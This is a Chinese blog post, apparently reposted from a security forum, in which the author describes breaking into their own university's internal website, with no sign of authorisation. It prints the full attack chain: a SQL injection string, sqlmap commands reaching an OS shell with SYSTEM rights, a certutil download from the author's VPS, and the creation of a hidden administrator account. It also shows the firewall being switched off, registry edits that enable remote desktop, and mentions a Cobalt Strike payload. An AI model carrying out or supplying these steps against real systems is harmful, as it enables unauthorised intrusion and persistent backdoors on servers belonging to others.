记一次不曲折的校内站点渗透

分手后的思念是犯贱 2024-04-07 10:40 95阅读 0赞

### **0x01 前言** ###

备考的时候偶然点了进了本校内网的某个站点 , 停下了复习(直接拔剑)

[![14ca6764457ea241481e43c8036e94b2.png][]][14ca6764457ea241481e43c8036e94b2.png 1]

### **0x02 渗透过程** ###

测试到注入

[http://url/newdetail.aspx?id=11999][http_url_newdetail.aspx_id_11999]' or 1=1 --

直接Sqlmap一把过 , 连waf都没得(狗头)

[![81386ff327d41314f06241355472cb31.png][]][81386ff327d41314f06241355472cb31.png 1]

随便看看

python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbs
    python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users

[![ab0a3eae13623c1f1a212c47268c3966.png][]][ab0a3eae13623c1f1a212c47268c3966.png 1]

**DBMS**

sqlserver 2005

[![14f46bff8fc6db86b4cfe600ad6c4b64.png][]][14f46bff8fc6db86b4cfe600ad6c4b64.png 1]

**whoami**

在windows中`nt authority system` 是内置的系统管理账户

[![ca4b8f04f67e0d483c9b9bb2271c88ab.png][]][ca4b8f04f67e0d483c9b9bb2271c88ab.png 1]

查看下目录`chdir`

[![d04c47d7b68720b0081728147a23c1c0.png][]][d04c47d7b68720b0081728147a23c1c0.png 1]

`Dir c:\`

[![394e37432d048cb0fc31c61f391f57e7.png][]][394e37432d048cb0fc31c61f391f57e7.png 1]

**OS版本**

Microsoft(R) Windows(R) Server 2003, Enterprise Edition

[![9ee08c962166a7aaba5a9a34fe401764.png][]][9ee08c962166a7aaba5a9a34fe401764.png 1]

**ipconfig**

[![7c35407ac637b81b26d53e665b58c2ec.png][]][7c35407ac637b81b26d53e665b58c2ec.png 1]

服务器端存在certutil等于是决定测试一下命令

vps

python -m SimpleHTTPServer 80

打一下

ping wt070h.dnslog.cn
    certutil.exe -urlcache -split -f http://funny_ip/amazing1x

发现回显

[![5282ccb66ae8380e3ef4439940f822a1.png][]][5282ccb66ae8380e3ef4439940f822a1.png 1]

奈何网站路径是中文的 , sqlmap写木马的话会乱码 , 找了找解决办法无果

[![a3583a02f0cb33af1053b8723748ac5c.png][]][a3583a02f0cb33af1053b8723748ac5c.png 1]

看看环境变量

[![c54f4e90eb449f8dffa95564a6ed164a.png][]][c54f4e90eb449f8dffa95564a6ed164a.png 1]

**Nmap看看端口**

因为尝试远程连接的时候出了一些问题，起初不知道是什么原因所以打算看看

[![fe6c43b39b573deb8ad49d2c8eaa53be.png][]][fe6c43b39b573deb8ad49d2c8eaa53be.png 1]

**尝试远程连接3389**

新建用户

#新建用户
    net user amazingadmin123 amazing.123456 /add
    #赋予权限
    net localgroup Administrators amazingadmin123 /add
    #激活用户
    net user amazingadmin123 /active:yes
    #关闭防火墙
    netsh firewall set opmode mode=disable
    #开启默认设置 netsh firewall reset

通过注册表开启3389端口

echo Windows Registry Editor Version 5.00 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
    echo "fDenyTSConnections"=dword:00000000 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg 
    echo "ortNumber"=dword:00000D3D >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
    echo "PortNumber"=dword:00000D3D >>3389.reg
    regedit /s 3389.reg

相关记录

[![bfb5d664e8e94807cc9e2baa7bae03a4.png][]][bfb5d664e8e94807cc9e2baa7bae03a4.png 1]

这个过程连续尝试了两三次都没有成功，也没找到原因，服务还关了，只能先考试等管理员开机了

[![c78e1fbe925a526fc0706a248a2890bf.png][]][c78e1fbe925a526fc0706a248a2890bf.png 1]

考完试第三天网站上线了，再试试新建用户……

原来是安全策略的问题，不能使用简单地密码，新建用户的时候用了个复杂的密码就行了

**远程连接✔️**

[![2dfab5486d19d997e25be6803f05167f.png][]][2dfab5486d19d997e25be6803f05167f.png 1]

配置加载中……

[![05ed456528af96af4c09186119340f95.png][]][05ed456528af96af4c09186119340f95.png 1]

[![dc1f49ce7cd06d143d3886a6affa1d55.png][]][dc1f49ce7cd06d143d3886a6affa1d55.png 1]

### **[0x03 总结][dc1f49ce7cd06d143d3886a6affa1d55.png 1]** ###

1.发现主页存在一处注入点

http://url/newdetail.aspx?id=11999' or 1=1 --

2.通过SQLMAP进行注入，执行命令：

sql-shell>select @@version; //查询数据库版本

sql-os>whoami //发现是system权限

sql-os>chdir //查看目录

sql-os>dir c: //列出C盘目录

sql-os>systeminfo //查看系统版本

sql-os>ipconfig //查看系统IP

sql-os>cuertutil //测试是否存在cuertutil 下载命令

3.在VPS搭建HTTP服务器

python -m SimpleHTTPServer 80

4.可以将cs生成exe上传到VPS服务器上。

5.通过NAMP扫描目标系统开放端口，发现3389存在

6.创建用户并添加到管理员权限，且启用账号和关闭防火功能

\#新建用户

sql-os>net user amazingadmin123 Admin@12$12 /add

\#赋予权限

sql-os>net localgroup Administrators amazingadmin123 /add

\#激活用户

sql-os>net user amazingadmin123 /active:yes

\#关闭防火墙

sql-os>netsh firewall set opmode mode=disable

7.通过mstsc成功远程连接

###  ###

[原文链接： ][dc1f49ce7cd06d143d3886a6affa1d55.png 1] [https://xz.aliyun.com/t/9444][https_xz.aliyun.com_t_9444]

[14ca6764457ea241481e43c8036e94b2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/27d36a9329a940aaa05eb3f977b50f21.png
[14ca6764457ea241481e43c8036e94b2.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185648-ee94a9cc-a5b4-1.jpg
[http_url_newdetail.aspx_id_11999]: http://url/newdetail.aspx?id=11999
[81386ff327d41314f06241355472cb31.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/c7e9f0fbc2264b42b4984c1fa2e2ed9c.png
[81386ff327d41314f06241355472cb31.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185648-eec638a2-a5b4-1.jpg
[ab0a3eae13623c1f1a212c47268c3966.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/f8b6cef437084593a2693a1b842870c9.png
[ab0a3eae13623c1f1a212c47268c3966.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185648-ef0c2b14-a5b4-1.jpg
[14f46bff8fc6db86b4cfe600ad6c4b64.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/eb71783d8eac43598546687a75a13ba5.png
[14f46bff8fc6db86b4cfe600ad6c4b64.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185649-ef2e861e-a5b4-1.jpg
[ca4b8f04f67e0d483c9b9bb2271c88ab.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/9d18ddda71fb4c159a2d956096670d56.png
[ca4b8f04f67e0d483c9b9bb2271c88ab.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185649-ef4448e6-a5b4-1.jpg
[d04c47d7b68720b0081728147a23c1c0.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/c1fb5e36aa544d90b622864874b1db9e.png
[d04c47d7b68720b0081728147a23c1c0.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185649-ef66248e-a5b4-1.jpg
[394e37432d048cb0fc31c61f391f57e7.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/2404ba5e839b4da09d4c8e6e7e40e6ab.png
[394e37432d048cb0fc31c61f391f57e7.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185649-ef9af7cc-a5b4-1.jpg
[9ee08c962166a7aaba5a9a34fe401764.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/4e5c32740a3d446e8404c8536f0b9c0f.png
[9ee08c962166a7aaba5a9a34fe401764.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185649-efaf9380-a5b4-1.jpg
[7c35407ac637b81b26d53e665b58c2ec.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/1aadaf7fcc044bf2bddfdb42327e4d09.png
[7c35407ac637b81b26d53e665b58c2ec.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185650-efd835c4-a5b4-1.jpg
[5282ccb66ae8380e3ef4439940f822a1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5e247363ee4244048ddc0b7f856046a8.png
[5282ccb66ae8380e3ef4439940f822a1.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185650-efed684a-a5b4-1.jpg
[a3583a02f0cb33af1053b8723748ac5c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/74c7f0fd37674210b648b00444cb6d9e.png
[a3583a02f0cb33af1053b8723748ac5c.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185650-effa4470-a5b4-1.jpg
[c54f4e90eb449f8dffa95564a6ed164a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/a362fccbaeca426a9dc2804d3cb0831d.png
[c54f4e90eb449f8dffa95564a6ed164a.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185650-f038cb14-a5b4-1.jpg
[fe6c43b39b573deb8ad49d2c8eaa53be.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/a25e9a2b984145aa8a6ecb2ce4648b5b.png
[fe6c43b39b573deb8ad49d2c8eaa53be.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185651-f09aa03c-a5b4-1.jpg
[55be5ea55e83294aa278f117f0cd643e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/6df6d037ba1745cbb14bb87dfd357efc.png
[55be5ea55e83294aa278f117f0cd643e.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185651-f0ea11bc-a5b4-1.jpg
[bfb5d664e8e94807cc9e2baa7bae03a4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/0edef58da3fc4e308e8b19719acc2545.png
[bfb5d664e8e94807cc9e2baa7bae03a4.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185652-f10fd8a2-a5b4-1.jpg
[c78e1fbe925a526fc0706a248a2890bf.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/855d2233fbf7497b9aaa0b2eb9ecfa2a.png
[c78e1fbe925a526fc0706a248a2890bf.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185652-f125afc4-a5b4-1.jpg
[2dfab5486d19d997e25be6803f05167f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/e82a8b063a714fe090c3c0c1e163fb8a.png
[2dfab5486d19d997e25be6803f05167f.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185652-f13fcab2-a5b4-1.jpg
[05ed456528af96af4c09186119340f95.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/3ca28d5281514d0d8eb08f5877126cbe.png
[05ed456528af96af4c09186119340f95.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185652-f14f0f36-a5b4-1.jpg
[dc1f49ce7cd06d143d3886a6affa1d55.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/59e11adf3c4945819684cf9642b36a6e.png
[dc1f49ce7cd06d143d3886a6affa1d55.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210425185652-f181593c-a5b4-1.jpg
[https_xz.aliyun.com_t_9444]: https://xz.aliyun.com/t/9444